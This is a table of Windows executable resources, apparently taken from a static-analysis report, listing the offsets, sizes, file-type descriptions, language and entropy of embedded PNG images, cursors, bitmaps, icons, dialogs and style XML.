                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce9c00xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cecd80x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cee300x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d09680xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d17400x129PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0303030303030303
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d05f80x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d05700x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cff000x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cfa700x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ff4e80xdd1PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003109980209217
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x404ba00xd61PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032116788321168
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4059080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x405b700xbb9PNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036654448517162
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4067300xc66PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034656584751103
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4073980xb90PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037162162162163
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42a5d00xb07PNG image data, 5 x 5, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003896563939072
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x429a800xb50PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037983425414365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4128f00x2885PNG image data, 42 x 348, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010604453870626
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4151780xd8ePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031700288184437
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x415f080x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4270e00x4f3PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0086819258089976
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41a7580x130fPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022545603607296
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41ba680xe74PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002972972972973
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41e9180x11baPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002423975319524
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41fad80xecePNG image data, 11 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029023746701846
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41c8e00x11baPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002423975319524
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x41daa00xe74PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002972972972973
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x407f280x1206PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023840485478976
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40a2600x11bcPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024229074889868
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4091300x112aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025034137460174
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40b4200x127aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023255813953489
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40efc00xd3ePNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003244837758112
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40fd000xbacPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036813922356091
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4114800x146aPNG image data, 56 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021048603138156
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4164480x122fPNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023630504833512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4176780xdecPNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030864197530864
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4184680x1100PNG image data, 42 x 228, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025275735294117
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4195680x11edPNG image data, 42 x 140, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023970363913706
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40d7580x1864PNG image data, 42 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003203074951954
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x40c6a00x10b5PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025718961889174
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4275d80x124bPNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023489216314327
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4288280x1256PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023434171282488
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4227f80xf2cPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002832131822863
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4219180xedePNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028901734104045
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4209a80xf69PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027883396704689
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4237280xe20PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030420353982301
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42b0d80xdc7PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031187978451943
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4002c00xbaePNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036789297658864
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x400e700xd91PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003167290526922
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x401c080xb12PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4371a80xbc3PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036532713384259
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4365080xc9fPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003404518724853
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4357880xd7dPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031856356791196
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x434b900xbf7PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035912504080966
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x433ef80xc96PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034140285536934
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4331680xd8cPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4397900xbdaPNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036255767963085
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x438af00xca0PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034034653465347
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x437d700xd80PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031828703703705
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42ff880xbe2PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036160420775806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42f2f80xc8cPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034246575342465
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42e5780xd7bPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031874818893074
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42d9900xbe7PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036101083032491
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42ccf80xc94PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034161490683229
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42bf780xd80PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031828703703705
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x42bea00xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x43bd880xbd0PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003637566137566
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x43b0f00xc97PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034129692832765
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x43a3700xd7aPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031884057971014
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4325880xbdaPNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036255767963085
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4318f80xc8fPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003421461897356
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x430b700xd86PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031773541305604
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4027200x1908PNG image data, 50 x 178, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9887640449438202
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4040280xb75PNG image data, 3 x 61, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037504261847938
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4108b00xbd0PNG image data, 9 x 51, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003637566137566
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x425b700x1570PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020043731778425
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x4245480x1623PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0019410622904534
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3308400x4e01HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1839851770243878
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3630000x4b09HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20396689052006872
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3972a80x4aa6HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20460491889063318
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3c8a700x4a18HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20397511598481655
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3fdb900x1955HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1918272937548188
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f0a80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f1e00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f2c00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f4100x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f5600x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f6b00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f8000x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f9500x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32faa00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fbf00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fd400x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fe900x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32ffe00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3301300x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3302800x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3303d00x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465c700x134dataEnglishUnited States0.20454545454545456
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465dc00x134dataEnglishUnited States0.2857142857142857
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465f100x134dataEnglishUnited States0.4675324675324675
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4660600x134dataEnglishUnited States0.2532467532467532
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4661b00x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4663000x134dataEnglishUnited States0.4383116883116883
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4664500x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4665a00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4666f00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4512987012987013
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4668400x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4669900x134dataEnglishUnited States0.4448051948051948
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x466ae00x134dataEnglishUnited States0.525974025974026
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f3b00x62cDevice independent bitmap graphic, 324 x 9 x 4, image size 1476EnglishUnited States0.2430379746835443
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f2c80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.5818965517241379
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f9e00x4a0Device independent bitmap graphic, 144 x 15 x 4, image size 1080EnglishUnited States0.3783783783783784
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43fe800x197aDevice independent bitmap graphic, 144 x 15 x 24, image size 6482, resolution 2834 x 2834 px/mEnglishUnited States0.380098129408157
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4418000xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.51
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441ad80xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.515
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441db00xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.43
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4420880xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.44
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4427c80x182aDevice independent bitmap graphic, 128 x 16 x 24, image size 6146, resolution 2834 x 2834 px/mEnglishUnited States0.2924345295829292
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4423600x468Device independent bitmap graphic, 128 x 16 x 4, image size 1024EnglishUnited States0.3058510638297872
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x443ff80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4803030303030303
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4448500x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4765151515151515
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4450a80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240EnglishUnited States0.41569767441860467
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4452000x188Device independent bitmap graphic, 48 x 12 x 4, image size 288EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x445fb80x1e8Device independent bitmap graphic, 48 x 16 x 4, image size 384EnglishUnited States0.5081967213114754
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x446ac80xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.18736462093862816
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4475a00xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.1844765342960289
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4480780xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.19497523000707714
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x448b880x7e2Device independent bitmap graphic, 25 x 26 x 24, image size 1978, resolution 2834 x 2834 px/mEnglishUnited States0.24033696729435083
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4493700xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.1935598018400566
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x449e800x134Device independent bitmap graphic, 17 x 17 x 4, image size 204EnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4461a00x928Device independent bitmap graphic, 48 x 16 x 24, image size 0, resolution 2834 x 2834 px/mEnglishUnited States0.533703071672355
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4445200x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.7518518518518519
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x444d780x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.3790123456790123
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4453880xc2aDevice independent bitmap graphic, 64 x 16 x 24, image size 3074, resolution 2834 x 2834 px/mEnglishUnited States0.42485549132947975
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4418c80x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.9367816091954023
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441ba00x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.4482758620689655
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441e780x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.33524904214559387
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4421500x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.3371647509578544
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x449fb80x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.6320987654320988
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x44a2e80x2256Device independent bitmap graphic, 324 x 9 x 24, image size 8750, resolution 2834 x 2834 px/mEnglishUnited States0.0608646188850967
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x44c5400x602aDevice independent bitmap graphic, 192 x 32 x 32, image size 24578, resolution 2834 x 2834 px/mEnglishUnited States0.2250385896498497
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4525700x2028Device independent bitmap graphic, 128 x 16 x 32, image size 0EnglishUnited States0.24708454810495628
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4545980x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11570247933884298
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4559780x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.10999606454151908
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x456d580x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11511216056670602
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4581380xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.13157894736842105
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x458ff00x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11983471074380166
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x45a3d00x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.27371113734750097
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x45b7b00x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2699724517906336
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x45cb900x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2426210153482881
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x45df700xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.3413078149920255
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x45ee280x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.23868555686737505
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4602080x5a66Device independent bitmap graphic, 77 x 75 x 32, image size 23102, resolution 2834 x 2834 px/mEnglishUnited States0.046365914786967416
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x3306400xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x3306f80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x2f54f00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.40053763440860213
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x2f57d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5202702702702703
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x466c680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.33198924731182794
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x466f500x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.41216216216216217
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4670a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4671c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.2661290322580645
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4674d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.18010752688172044
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4677c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.35135135135135137
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4678e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.06092057761732852
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4681900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.07658959537572255
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4686f80xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.042901234567901236
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4693a00x368Device independent bitmap graphic, 16 x 32 x 24, image size 768EnglishUnited States0.10550458715596331
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x4697680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6400709219858156
                                                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x469bd00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5
                                                                                                                                                                                                                                                                                                                                                                                        RT_MENU0x469d200x11cdataEnglishUnited States0.573943661971831
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x32ed280x80dataEnglishUnited States0.7265625
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43d0480x13cdataEnglishUnited States0.5949367088607594
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43d1880x1a4dataEnglishUnited States0.5380952380952381
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43c9b00xe6dataEnglishUnited States0.6347826086956522
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43ca980x390dataEnglishUnited States0.4418859649122807
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43ce280x21cdataEnglishUnited States0.5037037037037037
